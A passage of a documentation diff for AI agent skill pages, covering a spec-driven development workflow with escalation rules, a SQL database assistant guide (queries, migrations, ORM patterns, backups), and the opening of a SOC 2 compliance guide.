expiresIn: number; // Seconds until access token expires
user: {
id: string;
email: string;
displayName: string;
};
}
```
Error Response (401):
```typescript
interface AuthError {
error: "INVALID_CREDENTIALS" | "TOKEN_EXPIRED" | "ACCOUNT_LOCKED";
message: string;
retryAfter?: number; // Seconds, present for rate-limited responses
}
```
```
### 7. Data Models
```markdown
## Data Models
### User
| Field | Type | Constraints |
|-------|------|-------------|
| id | UUID | Primary key, auto-generated |
| email | string | Unique, max 255 chars, valid email format |
| passwordHash | string | bcrypt, never exposed via API |
| createdAt | timestamp | UTC, immutable |
| lastLoginAt | timestamp | UTC, updated on each login |
| loginAttempts | integer | Reset to 0 on successful login |
| lockedUntil | timestamp | Null if not locked |
```
### 8. Out of Scope
Explicit exclusions prevent scope creep:
```markdown
## Out of Scope
- OS-1: Multi-factor authentication (separate spec: SPEC-042)
- OS-2: Social login providers beyond Google and GitHub
- OS-3: Admin impersonation of user accounts
- OS-4: Password complexity rules beyond minimum length (deferred to v2)
- OS-5: Session management UI (users cannot see/revoke active sessions yet)
```
If someone asks for an out-of-scope item during implementation, point them to this section. Do not build it.
---
## Bounded Autonomy Rules
These rules define when an agent (human or AI) MUST stop and ask for guidance vs. when they can proceed independently.
### STOP and Ask When:
1. **Scope creep detected.** The implementation requires something not in the spec. Even if it seems obviously needed, STOP. The spec might have excluded it deliberately.
2. **Ambiguity exceeds 30%.** If you cannot determine the correct behavior from the spec for more than 30% of a given requirement, the spec is incomplete. Do not guess.
3. **Breaking changes required.** The implementation would change an existing API contract, database schema, or public interface. Always escalate.
4. **Security implications.** Any change that touches authentication, authorization, encryption, or PII handling requires explicit approval.
5. **Performance characteristics unknown.** If a requirement says "MUST complete in < 500ms" but you have no way to measure or guarantee that, escalate before implementing a guess.
6. **Cross-team dependencies.** If the spec requires coordination with another team or service, confirm the dependency before building against it.
### Continue Autonomously When:
1. **Spec is clear and unambiguous** for the current task.
2. **All acceptance criteria have passing tests** and you are refactoring internals.
3. **Changes are non-breaking** — no public API, schema, or behavior changes.
4. **Implementation is a direct translation** of a well-defined acceptance criterion.
5. **Error handling follows established patterns** already documented in the codebase.
### Escalation Protocol
When you must stop, provide:
```markdown
## Escalation: [Brief Title]
**Blocked on:** [requirement ID, e.g., FR-3]
**Question:** [Specific, answerable question — not "what should I do?"]
**Options considered:**
A. [Option] — Pros: [...] Cons: [...]
B. [Option] — Pros: [...] Cons: [...]
**My recommendation:** [A or B, with reasoning]
**Impact of waiting:** [What is blocked until this is resolved?]
```
Never escalate without a recommendation. Never present an open-ended question. Always give options.
See `references/bounded_autonomy_rules.md` for the complete decision matrix.
---
## Workflow — 6 Phases
### Phase 1: Gather Requirements
**Goal:** Understand what needs to be built and why.
1. **Interview the user.** Ask:
- What problem does this solve?
- Who are the users?
- What does success look like?
- What explicitly should NOT be built?
2. **Read existing code.** Understand the current system before proposing changes.
3. **Identify constraints.** Performance budgets, security requirements, backward compatibility.
4. **List unknowns.** Every unknown is a risk. Surface them now, not during implementation.
**Exit criteria:** You can explain the feature to someone unfamiliar with the project in 2 minutes.
### Phase 2: Write Spec
**Goal:** Produce a complete spec document following The Spec Format above.
1. Fill every section of the template. No section left blank.
2. Number all requirements (FR-*, NFR-*, AC-*, EC-*, OS-*).
3. Use RFC 2119 keywords precisely.
4. Write acceptance criteria in Given/When/Then format.
5. Define API contracts with TypeScript-style types.
6. List explicit exclusions in Out of Scope.
**Exit criteria:** The spec can be handed to a developer who was not in the requirements meeting, and they can implement the feature without asking clarifying questions.
### Phase 3: Validate Spec
**Goal:** Verify the spec is complete, consistent, and implementable.
Run `spec_validator.py` against the spec file:
```bash
python spec_validator.py --file spec.md --strict
```
Manual validation checklist:
- [ ] Every functional requirement has at least one acceptance criterion
- [ ] Every acceptance criterion is testable (no subjective language)
- [ ] API contracts cover all endpoints mentioned in requirements
- [ ] Data models cover all entities mentioned in requirements
- [ ] Edge cases cover failure modes for every external dependency
- [ ] Out of scope is explicit about what was considered and rejected
- [ ] Non-functional requirements have measurable thresholds
**Exit criteria:** Spec scores 80+ on validator, and all manual checklist items pass.
### Phase 4: Generate Tests
**Goal:** Extract test cases from acceptance criteria before writing implementation code.
Run `test_extractor.py` against the approved spec:
```bash
python test_extractor.py --file spec.md --framework pytest --output tests/
```
1. Each acceptance criterion becomes one or more test cases.
2. Each edge case becomes a test case.
3. Tests are stubs — they define the assertion but not the implementation.
4. All tests MUST fail initially (red phase of TDD).
**Exit criteria:** You have a test file where every test fails with "not implemented" or equivalent.
### Phase 5: Implement
**Goal:** Write code that makes failing tests pass, one acceptance criterion at a time.
1. Pick one acceptance criterion (start with the simplest).
2. Make its test(s) pass with minimal code.
3. Run the full test suite — no regressions.
4. Commit.
5. Pick the next acceptance criterion. Repeat.
**Rules:**
- Do NOT implement anything not in the spec.
- Do NOT optimize before all acceptance criteria pass.
- Do NOT refactor before all acceptance criteria pass.
- If you discover a missing requirement, STOP and update the spec first.
**Exit criteria:** All tests pass. All acceptance criteria satisfied.
### Phase 6: Self-Review
**Goal:** Verify implementation matches spec before marking done.
Run through the Self-Review Checklist below. If any item fails, fix it before declaring the task complete.
---
## Self-Review Checklist
Before marking any implementation as done, verify ALL of the following:
- [ ] **Every acceptance criterion has a passing test.** No exceptions. If AC-3 exists, a test for AC-3 exists and passes.
- [ ] **Every edge case has a test.** EC-1 through EC-N all have corresponding test cases.
- [ ] **No scope creep.** The implementation does not include features not in the spec. If you added something, either update the spec or remove it.
- [ ] **API contracts match implementation.** Request/response shapes in code match the spec exactly. Field names, types, status codes — all of it.
- [ ] **Error scenarios tested.** Every error response defined in the spec has a test that triggers it.
- [ ] **Non-functional requirements verified.** If the spec says < 500ms, you have evidence (benchmark, load test, profiling) that it meets the threshold.
- [ ] **Data model matches.** Database schema matches the spec. No extra columns, no missing constraints.
- [ ] **Out-of-scope items not built.** Double-check that nothing from the Out of Scope section leaked into the implementation.
---
## Integration with TDD Guide
Spec-driven workflow and TDD are complementary, not competing:
```
Spec-Driven Workflow TDD (Red-Green-Refactor)
───────────────────── ──────────────────────────
Phase 1: Gather Requirements
Phase 2: Write Spec
Phase 3: Validate Spec
Phase 4: Generate Tests ──→ RED: Tests exist and fail
Phase 5: Implement ──→ GREEN: Minimal code to pass
Phase 6: Self-Review ──→ REFACTOR: Clean up internals
```
**The handoff:** Spec-driven workflow produces the test stubs (Phase 4). TDD takes over from there. The spec tells you WHAT to test. TDD tells you HOW to implement.
Use `engineering-team/tdd-guide` for:
- Red-green-refactor cycle discipline
- Coverage analysis and gap detection
- Framework-specific test patterns (Jest, Pytest, JUnit)
Use `engineering/spec-driven-workflow` for:
- Defining what to build before building it
- Acceptance criteria authoring
- Completeness validation
- Scope control
---
## Examples
### Full Spec: User Password Reset
```markdown
# Spec: Password Reset Flow
**Author:** Engineering Team
**Date:** 2026-03-25
**Status:** Approved
## Context
Users who forget their passwords currently have no self-service recovery option.
Support receives ~200 password reset requests per week, costing approximately
8 hours of support time. This feature eliminates that burden entirely.
## Functional Requirements
- FR-1: The system MUST allow users to request a password reset via email.
- FR-2: The system MUST send a reset link that expires after 1 hour.
- FR-3: The system MUST invalidate all previous reset links when a new one is requested.
- FR-4: The system MUST enforce minimum password length of 8 characters on reset.
- FR-5: The system MUST NOT reveal whether an email exists in the system.
- FR-6: The system SHOULD log all reset attempts for audit purposes.
## Acceptance Criteria
### AC-1: Request reset (FR-1, FR-5)
Given a user on the password reset page
When they enter any email address and submit
Then they see "If an account exists, a reset link has been sent"
And the response is identical whether the email exists or not
### AC-2: Valid reset link (FR-2)
Given a user who received a reset email 30 minutes ago
When they click the reset link
Then they see the password reset form
### AC-3: Expired reset link (FR-2)
Given a user who received a reset email 2 hours ago
When they click the reset link
Then they see "This link has expired. Please request a new one."
### AC-4: Previous links invalidated (FR-3)
Given a user who requested two reset emails
When they click the link from the first email
Then they see "This link is no longer valid."
## Edge Cases
- EC-1: User submits reset for non-existent email → Same success message (FR-5).
- EC-2: User clicks reset link twice → Second click shows "already used" if password was changed.
- EC-3: Email delivery fails → Log error, do not retry automatically.
- EC-4: User requests reset while already logged in → Allow it, do not force logout.
## Out of Scope
- OS-1: Security questions as alternative reset method.
- OS-2: SMS-based password reset.
- OS-3: Admin-initiated password reset (separate spec).
```
### Extracted Test Cases (from above spec)
```python
# Generated by test_extractor.py --framework pytest
class TestPasswordReset:
def test_ac1_request_reset_existing_email(self):
"""AC-1: Request reset with existing email shows generic message."""
# Given a user on the password reset page
# When they enter a registered email and submit
# Then they see "If an account exists, a reset link has been sent"
raise NotImplementedError("Implement this test")
def test_ac1_request_reset_nonexistent_email(self):
"""AC-1: Request reset with unknown email shows same generic message."""
# Given a user on the password reset page
# When they enter an unregistered email and submit
# Then they see identical response to existing email case
raise NotImplementedError("Implement this test")
def test_ac2_valid_reset_link(self):
"""AC-2: Reset link works within expiry window."""
raise NotImplementedError("Implement this test")
def test_ac3_expired_reset_link(self):
"""AC-3: Reset link rejected after 1 hour."""
raise NotImplementedError("Implement this test")
def test_ac4_previous_links_invalidated(self):
"""AC-4: Old reset links stop working when new one is requested."""
raise NotImplementedError("Implement this test")
def test_ec1_nonexistent_email_same_response(self):
"""EC-1: Non-existent email produces identical response."""
raise NotImplementedError("Implement this test")
def test_ec2_reset_link_used_twice(self):
"""EC-2: Already-used reset link shows appropriate message."""
raise NotImplementedError("Implement this test")
```
---
## Anti-Patterns
### 1. Coding Before Spec Approval
**Symptom:** "I'll start coding while the spec is being reviewed."
**Problem:** The review will surface changes. Now you have code that implements a rejected design.
**Rule:** Implementation does not begin until spec status is "Approved."
### 2. Vague Acceptance Criteria
**Symptom:** "The system should work well" or "The UI should be responsive."
**Problem:** Untestable. What does "well" mean? What does "responsive" mean?
**Rule:** Every acceptance criterion must be verifiable by a machine. If you cannot write a test for it, rewrite the criterion.
### 3. Missing Edge Cases
**Symptom:** Happy path is specified, error paths are not.
**Problem:** Developers invent error handling on the fly, leading to inconsistent behavior.
**Rule:** For every external dependency (API, database, file system, user input), specify at least one failure scenario.
### 4. Spec as Post-Hoc Documentation
**Symptom:** "Let me write the spec now that the feature is done."
**Problem:** This is documentation, not specification. It describes what was built, not what should have been built. It cannot catch design errors because the design is already frozen.
**Rule:** If the spec was written after the code, it is not a spec. Relabel it as documentation.
### 5. Gold-Plating Beyond Spec
**Symptom:** "While I was in there, I also added..."
**Problem:** Untested code. Unreviewed design. Potential for subtle bugs in the "bonus" feature.
**Rule:** If it is not in the spec, it does not get built. File a new spec for additional features.
### 6. Acceptance Criteria Without Requirement Traceability
**Symptom:** AC-7 exists but does not reference any FR-* or NFR-*.
**Problem:** Orphaned criteria mean either a requirement is missing or the criterion is unnecessary.
**Rule:** Every AC-* MUST reference at least one FR-* or NFR-*.
### 7. Skipping Validation
**Symptom:** "The spec looks fine, let's just start."
**Problem:** Missing sections discovered during implementation cause blocking delays.
**Rule:** Always run `spec_validator.py --strict` before starting implementation. Fix all warnings.
---
## Cross-References
- **`engineering-team/tdd-guide`** — Red-green-refactor cycle, test generation, coverage analysis. Use after Phase 4 of this workflow.
- **`engineering/focused-fix`** — Deep-dive feature repair. When a spec-driven implementation has systemic issues, use focused-fix for diagnosis.
- **`engineering/rag-architect`** — If the feature involves retrieval or knowledge systems, use rag-architect for the technical design within the spec.
- **`references/spec_format_guide.md`** — Complete template with section-by-section explanations.
- **`references/bounded_autonomy_rules.md`** — Full decision matrix for when to stop vs. continue.
- **`references/acceptance_criteria_patterns.md`** — Pattern library for writing Given/When/Then criteria.
---
## Tools
| Script | Purpose | Key Flags |
|--------|---------|-----------|
| `spec_generator.py` | Generate spec template from feature name/description | `--name`, `--description`, `--format`, `--json` |
| `spec_validator.py` | Validate spec completeness (0-100 score) | `--file`, `--strict`, `--json` |
| `test_extractor.py` | Extract test stubs from acceptance criteria | `--file`, `--framework`, `--output`, `--json` |
```bash
# Generate a spec template
python spec_generator.py --name "User Authentication" --description "OAuth 2.0 login flow"
# Validate a spec
python spec_validator.py --file specs/auth.md --strict
# Extract test cases
python test_extractor.py --file specs/auth.md --framework pytest --output tests/test_auth.py
```

View File

@@ -0,0 +1,468 @@
---
title: "SQL Database Assistant - POWERFUL Tier Skill — Agent Skill for Codex & OpenClaw"
description: "Use when the user asks to write SQL queries, optimize database performance, generate migrations, explore database schemas, or work with ORMs like Prisma, Drizzle, TypeORM, and SQLAlchemy. Agent skill for Claude Code, Codex CLI, Gemini CLI, OpenClaw."
---
# SQL Database Assistant - POWERFUL Tier Skill
<div class="page-meta" markdown>
<span class="meta-badge">:material-rocket-launch: Engineering - POWERFUL</span>
<span class="meta-badge">:material-identifier: `sql-database-assistant`</span>
<span class="meta-badge">:material-github: <a href="https://github.com/alirezarezvani/claude-skills/tree/main/engineering/sql-database-assistant/SKILL.md">Source</a></span>
</div>
<div class="install-banner" markdown>
<span class="install-label">Install:</span> <code>claude /plugin install engineering-advanced-skills</code>
</div>
## Overview
The operational companion to database design. While **database-designer** focuses on schema architecture and **database-schema-designer** handles ERD modeling, this skill covers the day-to-day: writing queries, optimizing performance, generating migrations, and bridging the gap between application code and database engines.
### Core Capabilities
- **Natural Language to SQL** — translate requirements into correct, performant queries
- **Schema Exploration** — introspect live databases across PostgreSQL, MySQL, SQLite, SQL Server
- **Query Optimization** — EXPLAIN analysis, index recommendations, N+1 detection, rewrite patterns
- **Migration Generation** — up/down scripts, zero-downtime strategies, rollback plans
- **ORM Integration** — Prisma, Drizzle, TypeORM, SQLAlchemy patterns and escape hatches
- **Multi-Database Support** — dialect-aware SQL with compatibility guidance
### Tools
| Script | Purpose |
|--------|---------|
| `scripts/query_optimizer.py` | Static analysis of SQL queries for performance issues |
| `scripts/migration_generator.py` | Generate migration file templates from change descriptions |
| `scripts/schema_explorer.py` | Generate schema documentation from introspection queries |
---
## Natural Language to SQL
### Translation Patterns
When converting requirements to SQL, follow this sequence:
1. **Identify entities** — map nouns to tables
2. **Identify relationships** — map verbs to JOINs or subqueries
3. **Identify filters** — map adjectives/conditions to WHERE clauses
4. **Identify aggregations** — map "total", "average", "count" to GROUP BY
5. **Identify ordering** — map "top", "latest", "highest" to ORDER BY + LIMIT
### Common Query Templates
**Top-N per group (window function)**
```sql
SELECT * FROM (
SELECT *, ROW_NUMBER() OVER (PARTITION BY department_id ORDER BY salary DESC) AS rn
FROM employees
) ranked WHERE rn <= 3;
```
**Running totals**
```sql
SELECT date, amount,
SUM(amount) OVER (ORDER BY date ROWS BETWEEN UNBOUNDED PRECEDING AND CURRENT ROW) AS running_total
FROM transactions;
```
**Gap detection**
```sql
SELECT curr.id, curr.seq_num, prev.seq_num AS prev_seq
FROM records curr
LEFT JOIN records prev ON prev.seq_num = curr.seq_num - 1
WHERE prev.id IS NULL AND curr.seq_num > 1;
```
**UPSERT (PostgreSQL)**
```sql
INSERT INTO settings (key, value, updated_at)
VALUES ('theme', 'dark', NOW())
ON CONFLICT (key) DO UPDATE SET value = EXCLUDED.value, updated_at = EXCLUDED.updated_at;
```
**UPSERT (MySQL)**
```sql
INSERT INTO settings (key_name, value, updated_at)
VALUES ('theme', 'dark', NOW())
ON DUPLICATE KEY UPDATE value = VALUES(value), updated_at = VALUES(updated_at);
```
> See references/query_patterns.md for JOINs, CTEs, window functions, JSON operations, and more.
---
## Schema Exploration
### Introspection Queries
**PostgreSQL — list tables and columns**
```sql
SELECT table_name, column_name, data_type, is_nullable, column_default
FROM information_schema.columns
WHERE table_schema = 'public'
ORDER BY table_name, ordinal_position;
```
**PostgreSQL — foreign keys**
```sql
SELECT tc.table_name, kcu.column_name,
ccu.table_name AS foreign_table, ccu.column_name AS foreign_column
FROM information_schema.table_constraints tc
JOIN information_schema.key_column_usage kcu ON tc.constraint_name = kcu.constraint_name
JOIN information_schema.constraint_column_usage ccu ON tc.constraint_name = ccu.constraint_name
WHERE tc.constraint_type = 'FOREIGN KEY';
```
**MySQL — table sizes**
```sql
SELECT table_name, table_rows,
ROUND(data_length / 1024 / 1024, 2) AS data_mb,
ROUND(index_length / 1024 / 1024, 2) AS index_mb
FROM information_schema.tables
WHERE table_schema = DATABASE()
ORDER BY data_length DESC;
```
**SQLite — schema dump**
```sql
SELECT name, sql FROM sqlite_master WHERE type = 'table' ORDER BY name;
```
**SQL Server — columns with types**
```sql
SELECT t.name AS table_name, c.name AS column_name,
ty.name AS data_type, c.max_length, c.is_nullable
FROM sys.columns c
JOIN sys.tables t ON c.object_id = t.object_id
JOIN sys.types ty ON c.user_type_id = ty.user_type_id
ORDER BY t.name, c.column_id;
```
### Generating Documentation from Schema
Use `scripts/schema_explorer.py` to produce markdown or JSON documentation:
```bash
python scripts/schema_explorer.py --dialect postgres --tables all --format md
python scripts/schema_explorer.py --dialect mysql --tables users,orders --format json --json
```
---
## Query Optimization
### EXPLAIN Analysis Workflow
1. **Run EXPLAIN ANALYZE** (PostgreSQL) or **EXPLAIN FORMAT=JSON** (MySQL)
2. **Identify the costliest node** — Seq Scan on large tables, Nested Loop with high row estimates
3. **Check for missing indexes** — sequential scans on filtered columns
4. **Look for estimation errors** — planned vs actual rows divergence signals stale statistics
5. **Evaluate JOIN order** — ensure the smallest result set drives the join
### Index Recommendation Checklist
- Columns in WHERE clauses with high selectivity
- Columns in JOIN conditions (foreign keys)
- Columns in ORDER BY when combined with LIMIT
- Composite indexes matching multi-column WHERE predicates (most selective column first)
- Partial indexes for queries with constant filters (e.g., `WHERE status = 'active'`)
- Covering indexes to avoid table lookups for read-heavy queries
### Query Rewriting Patterns
| Anti-Pattern | Rewrite |
|-------------|---------|
| `SELECT * FROM orders` | `SELECT id, status, total FROM orders` (explicit columns) |
| `WHERE YEAR(created_at) = 2025` | `WHERE created_at >= '2025-01-01' AND created_at < '2026-01-01'` (sargable) |
| Correlated subquery in SELECT | LEFT JOIN with aggregation |
| `NOT IN (SELECT ...)` with NULLs | `NOT EXISTS (SELECT 1 ...)` |
| `UNION` (dedup) when not needed | `UNION ALL` |
| `LIKE '%search%'` | Full-text search index (GIN/FULLTEXT) |
| `ORDER BY RAND()` | Application-side random sampling or `TABLESAMPLE` |
### N+1 Detection
**Symptoms:**
- Application loop that executes one query per parent row
- ORM lazy-loading related entities inside a loop
- Query log shows hundreds of identical SELECT patterns with different IDs
**Fixes:**
- Use eager loading (`include` in Prisma, `joinedload` in SQLAlchemy)
- Batch queries with `WHERE id IN (...)`
- Use DataLoader pattern for GraphQL resolvers
### Static Analysis Tool
```bash
python scripts/query_optimizer.py --query "SELECT * FROM orders WHERE status = 'pending'" --dialect postgres
python scripts/query_optimizer.py --query queries.sql --dialect mysql --json
```
> See references/optimization_guide.md for EXPLAIN plan reading, index types, and connection pooling.
---
## Migration Generation
### Zero-Downtime Migration Patterns
**Adding a column (safe)**
```sql
-- Up
ALTER TABLE users ADD COLUMN phone VARCHAR(20);
-- Down
ALTER TABLE users DROP COLUMN phone;
```
**Renaming a column (expand-contract)**
```sql
-- Step 1: Add new column
ALTER TABLE users ADD COLUMN full_name VARCHAR(255);
-- Step 2: Backfill
UPDATE users SET full_name = name;
-- Step 3: Deploy app reading both columns
-- Step 4: Deploy app writing only new column
-- Step 5: Drop old column
ALTER TABLE users DROP COLUMN name;
```
**Adding a NOT NULL column (safe sequence)**
```sql
-- Step 1: Add nullable
ALTER TABLE orders ADD COLUMN region VARCHAR(50);
-- Step 2: Backfill with default
UPDATE orders SET region = 'unknown' WHERE region IS NULL;
-- Step 3: Add constraint
ALTER TABLE orders ALTER COLUMN region SET NOT NULL;
ALTER TABLE orders ALTER COLUMN region SET DEFAULT 'unknown';
```
**Index creation (non-blocking, PostgreSQL)**
```sql
CREATE INDEX CONCURRENTLY idx_orders_status ON orders (status);
```
### Data Backfill Strategies
- **Batch updates** — process in chunks of 1000-10000 rows to avoid lock contention
- **Background jobs** — run backfills asynchronously with progress tracking
- **Dual-write** — write to old and new columns during transition period
- **Validation queries** — verify row counts and data integrity after each batch
### Rollback Strategies
Every migration must have a reversible down script. For irreversible changes:
1. **Backup before execution** — `pg_dump` the affected tables
2. **Feature flags** — application can switch between old/new schema reads
3. **Shadow tables** — keep a copy of the original table during migration window
### Migration Generator Tool
```bash
python scripts/migration_generator.py --change "add email_verified boolean to users" --dialect postgres --format sql
python scripts/migration_generator.py --change "rename column name to full_name in customers" --dialect mysql --format alembic --json
```
---
## Multi-Database Support
### Dialect Differences
| Feature | PostgreSQL | MySQL | SQLite | SQL Server |
|---------|-----------|-------|--------|------------|
| UPSERT | `ON CONFLICT DO UPDATE` | `ON DUPLICATE KEY UPDATE` | `ON CONFLICT DO UPDATE` | `MERGE` |
| Boolean | Native `BOOLEAN` | `TINYINT(1)` | `INTEGER` | `BIT` |
| Auto-increment | `SERIAL` / `GENERATED` | `AUTO_INCREMENT` | `INTEGER PRIMARY KEY` | `IDENTITY` |
| JSON | `JSONB` (indexed) | `JSON` | Text (ext) | `NVARCHAR(MAX)` |
| Array | Native `ARRAY` | Not supported | Not supported | Not supported |
| CTE (recursive) | Full support | 8.0+ | 3.8.3+ | Full support |
| Window functions | Full support | 8.0+ | 3.25.0+ | Full support |
| Full-text search | `tsvector` + GIN | `FULLTEXT` index | FTS5 extension | Full-text catalog |
| LIMIT/OFFSET | `LIMIT n OFFSET m` | `LIMIT n OFFSET m` | `LIMIT n OFFSET m` | `OFFSET m ROWS FETCH NEXT n ROWS ONLY` |
### Compatibility Tips
- **Always use parameterized queries** — prevents SQL injection across all dialects
- **Avoid dialect-specific functions in shared code** — wrap in adapter layer
- **Test migrations on target engine** — `information_schema` varies between engines
- **Use ISO date format** — `'YYYY-MM-DD'` works everywhere
- **Quote identifiers** — use double quotes (SQL standard) or backticks (MySQL)
---
## ORM Patterns
### Prisma
**Schema definition**
```prisma
model User {
id Int @id @default(autoincrement())
email String @unique
name String?
posts Post[]
createdAt DateTime @default(now())
}
model Post {
id Int @id @default(autoincrement())
title String
author User @relation(fields: [authorId], references: [id])
authorId Int
}
```
**Migrations**: `npx prisma migrate dev --name add_user_email`
**Query API**: `prisma.user.findMany({ where: { email: { contains: '@' } }, include: { posts: true } })`
**Raw SQL escape hatch**: `prisma.$queryRaw\`SELECT * FROM users WHERE id = ${userId}\``
### Drizzle
**Schema-first definition**
```typescript
export const users = pgTable('users', {
id: serial('id').primaryKey(),
email: varchar('email', { length: 255 }).notNull().unique(),
name: text('name'),
createdAt: timestamp('created_at').defaultNow(),
});
```
**Query builder**: `db.select().from(users).where(eq(users.email, email))`
**Migrations**: `npx drizzle-kit generate` then `npx drizzle-kit push` (the dialect-suffixed `generate:pg`/`push:pg` forms are deprecated since drizzle-kit 0.21)
### TypeORM
**Entity decorators**
```typescript
@Entity()
export class User {
@PrimaryGeneratedColumn()
id: number;
@Column({ unique: true })
email: string;
@OneToMany(() => Post, post => post.author)
posts: Post[];
}
```
**Repository pattern**: `userRepo.find({ where: { email }, relations: ['posts'] })`
**Migrations**: `npx typeorm migration:generate src/migrations/AddUserEmail -d src/data-source.ts` (TypeORM 0.3+; the older `-n` flag was removed)
### SQLAlchemy
**Declarative models**
```python
class User(Base):
__tablename__ = 'users'
id = Column(Integer, primary_key=True)
email = Column(String(255), unique=True, nullable=False)
name = Column(String(255))
posts = relationship('Post', back_populates='author')
```
**Session management**: Always use `with Session() as session:` context manager
**Alembic migrations**: `alembic revision --autogenerate -m "add user email"`
> See references/orm_patterns.md for side-by-side comparisons and migration workflows per ORM.
---
## Data Integrity
### Constraint Strategy
- **Primary keys** — every table must have one; prefer surrogate keys (serial/UUID)
- **Foreign keys** — enforce referential integrity; define ON DELETE behavior explicitly
- **UNIQUE constraints** — for business-level uniqueness (email, slug, API key)
- **CHECK constraints** — validate ranges, enums, and business rules at the DB level
- **NOT NULL** — default to NOT NULL; make nullable only when genuinely optional
### Transaction Isolation Levels
| Level | Dirty Read | Non-Repeatable Read | Phantom Read | Use Case |
|-------|-----------|-------------------|-------------|----------|
| READ UNCOMMITTED | Yes | Yes | Yes | Never recommended |
| READ COMMITTED | No | Yes | Yes | Default for PostgreSQL, general OLTP |
| REPEATABLE READ | No | No | Yes (InnoDB: No) | Financial calculations |
| SERIALIZABLE | No | No | No | Critical consistency (billing, inventory) |
### Deadlock Prevention
1. **Consistent lock ordering** — always acquire locks in the same table/row order
2. **Short transactions** — minimize time between first lock and commit
3. **Advisory locks** — use `pg_advisory_lock()` for application-level coordination
4. **Retry logic** — catch deadlock errors and retry with exponential backoff
---
## Backup & Restore
### PostgreSQL
```bash
# Full backup
pg_dump -Fc --no-owner dbname > backup.dump
# Restore
pg_restore -d dbname --clean --no-owner backup.dump
# Point-in-time recovery: configure WAL archiving + restore_command
```
### MySQL
```bash
# Full backup
mysqldump --single-transaction --routines --triggers dbname > backup.sql
# Restore
mysql dbname < backup.sql
# Binary log for PITR: mysqlbinlog --start-datetime="2025-01-01 00:00:00" binlog.000001
```
### SQLite
```bash
# Backup (safe with concurrent reads)
sqlite3 dbname ".backup backup.db"
```
### Backup Best Practices
- **Automate** — cron or systemd timer, never manual-only
- **Test restores** — untested backups are not backups
- **Offsite copies** — S3, GCS, or separate region
- **Retention policy** — daily for 7 days, weekly for 4 weeks, monthly for 12 months
- **Monitor backup size and duration** — sudden changes signal issues
---
## Anti-Patterns
| Anti-Pattern | Problem | Fix |
|-------------|---------|-----|
| `SELECT *` | Transfers unnecessary data, breaks on schema changes | Explicit column list |
| Missing indexes on FK columns | Slow JOINs and cascading deletes | Add indexes on all foreign keys |
| N+1 queries | 1 + N round trips to database | Eager loading or batch queries |
| Implicit type coercion | `WHERE id = '123'` prevents index use | Match types in predicates |
| No connection pooling | Exhausts connections under load | PgBouncer, ProxySQL, or ORM pool |
| Unbounded queries | No LIMIT risks returning millions of rows | Always paginate |
| Storing money as FLOAT | Rounding errors | Use `DECIMAL(19,4)` or integer cents |
| God tables | One table with 50+ columns | Normalize or use vertical partitioning |
| Soft deletes everywhere | Complicates every query with `WHERE deleted_at IS NULL` | Archive tables or event sourcing |
| Raw string concatenation | SQL injection | Parameterized queries always |
---
## Cross-References
| Skill | Relationship |
|-------|-------------|
| **database-designer** | Schema architecture, normalization analysis, ERD generation |
| **database-schema-designer** | Visual ERD modeling, relationship mapping |
| **migration-architect** | Complex multi-step migration orchestration |
| **api-design-reviewer** | Ensuring API endpoints align with query patterns |
| **observability-platform** | Query performance monitoring, slow query alerts |

View File

@@ -1,13 +1,13 @@
---
title: "Regulatory & Quality Skills — Agent Skills & Codex Plugins"
description: "13 regulatory & quality skills — regulatory and quality management agent skill for ISO 13485, MDR, FDA, and GDPR compliance. Works with Claude Code, Codex CLI, Gemini CLI, and OpenClaw."
description: "14 regulatory & quality skills — regulatory and quality management agent skill for ISO 13485, MDR, FDA, and GDPR compliance. Works with Claude Code, Codex CLI, Gemini CLI, and OpenClaw."
---
<div class="domain-header" markdown>
# :material-shield-check-outline: Regulatory & Quality
<p class="domain-count">13 skills in this domain</p>
<p class="domain-count">14 skills in this domain</p>
</div>
@@ -95,4 +95,10 @@ description: "13 regulatory & quality skills — regulatory and quality manageme
ISO 14971:2019 risk management implementation throughout the medical device lifecycle.
- **[SOC 2 Compliance](soc2-compliance.md)**
SOC 2 Type I and Type II compliance preparation for SaaS companies. Covers Trust Service Criteria mapping, control ma...
---
</div>

View File

@@ -0,0 +1,428 @@
---
title: "SOC 2 Compliance — Agent Skill for Compliance"
description: "Use when the user asks to prepare for SOC 2 audits, map Trust Service Criteria, build control matrices, collect audit evidence, perform gap analysis. Agent skill for Claude Code, Codex CLI, Gemini CLI, OpenClaw."
---
# SOC 2 Compliance
<div class="page-meta" markdown>
<span class="meta-badge">:material-shield-check-outline: Regulatory & Quality</span>
<span class="meta-badge">:material-identifier: `soc2-compliance`</span>
<span class="meta-badge">:material-github: <a href="https://github.com/alirezarezvani/claude-skills/tree/main/ra-qm-team/soc2-compliance/SKILL.md">Source</a></span>
</div>
<div class="install-banner" markdown>
<span class="install-label">Install:</span> <code>claude /plugin install ra-qm-skills</code>
</div>
SOC 2 Type I and Type II compliance preparation for SaaS companies. Covers Trust Service Criteria mapping, control matrix generation, evidence collection, gap analysis, and audit readiness assessment.
## Table of Contents
- [Overview](#overview)
- [Trust Service Criteria](#trust-service-criteria)
- [Control Matrix Generation](#control-matrix-generation)
- [Gap Analysis Workflow](#gap-analysis-workflow)
- [Evidence Collection](#evidence-collection)
- [Audit Readiness Checklist](#audit-readiness-checklist)
- [Vendor Management](#vendor-management)
- [Continuous Compliance](#continuous-compliance)
- [Anti-Patterns](#anti-patterns)
- [Tools](#tools)
- [References](#references)
- [Cross-References](#cross-references)
---
## Overview
### What Is SOC 2?
SOC 2 (System and Organization Controls 2) is an auditing framework developed by the AICPA that evaluates how a service organization manages customer data. It applies to any technology company that stores, processes, or transmits customer information — primarily SaaS, cloud infrastructure, and managed service providers.
### Type I vs Type II
| Aspect | Type I | Type II |
|--------|--------|---------|
| **Scope** | Design of controls at a point in time | Design AND operating effectiveness over a period |
| **Duration** | Snapshot (single date) | Observation window (3-12 months, typically 6) |
| **Evidence** | Control descriptions, policies | Control descriptions + operating evidence (logs, tickets, screenshots) |
| **Cost** | $20K-$50K (audit fees) | $30K-$100K+ (audit fees) |
| **Timeline** | 1-2 months (audit phase) | 6-12 months (observation + audit) |
| **Best For** | First-time compliance, rapid market need | Mature organizations, enterprise customers |
### Who Needs SOC 2?
- **SaaS companies** selling to enterprise customers
- **Cloud infrastructure providers** handling customer workloads
- **Data processors** managing PII, PHI, or financial data
- **Managed service providers** with access to client systems
- **Any vendor** whose customers require third-party assurance
### Typical Journey
```
Gap Assessment → Remediation → Type I Audit → Observation Period → Type II Audit → Annual Renewal
(4-8 wk) (8-16 wk) (4-6 wk) (6-12 mo) (4-6 wk) (ongoing)
```
---
## Trust Service Criteria
